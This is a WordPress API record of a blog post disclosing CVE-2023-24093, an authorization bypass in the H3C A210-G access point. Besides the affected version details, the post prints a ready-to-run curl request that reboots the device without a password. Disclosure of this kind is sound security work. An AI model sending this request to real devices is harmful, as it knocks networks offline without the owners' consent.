{"id":66,"date":"2023-01-12T11:27:21","date_gmt":"2023-01-12T03:27:21","guid":{"rendered":"https:\/\/blog.luckytain.com\/?p=66"},"modified":"2023-02-23T16:20:50","modified_gmt":"2023-02-23T08:20:50","slug":"h3c-a210-g-access-point-web-aspform-authorization-vulnerability","status":"publish","type":"post","link":"https:\/\/blog.luckytain.com\/?p=66","title":{"rendered":"[CVE-2023-24093] H3C A210-G Access Point Web aspForm Authorization Vulnerability"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p>A vulnerability exists in the H3C A210-G device that allows unauthorized operation of the device without password<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>Product: H3C A210-G<\/p>\n\n\n\n<p>Software Version: A210-GV100R005<\/p>\n\n\n\n<p>Bootrom Version: 106<\/p>\n\n\n\n<p>Hardware Version: VER.A<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>Reboot Router Exp(192.168.21.2): <\/p>\n\n\n\n<p><code>curl -k -i --raw -X POST -d \"CMD=Reboot_Router&amp;GO=do_rst.asp&amp;SET0=RebootRouter%%3D1&amp;nowait=1&amp;location_addr=http%%3A%%2F%%2F192.168.21.2%%2Fdevice_restart.asp\" \"http:\/\/192.168.21.2\/goform\/aspForm\" -H \"Origin: http:\/\/192.168.21.2\" -H \"Referer: http:\/\/192.168.21.2\/device_restart.asp\"<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A vulnerability exists in the H3C A210-G device that al [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[14],"class_list":["post-66","post","type-post","status-publish","format-standard","hentry","category-uncategorized","tag-14"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=\/wp\/v2\/posts\/66","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=66"}],"version-history":[{"count":2,"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=\/wp\/v2\/posts\/66\/revisions"}],"predecessor-version":[{"id":69,"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=\/wp\/v2\/posts\/66\/revisions\/69"}],"wp:attachment":[{"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=66"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=66"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.luckytain.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=66"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}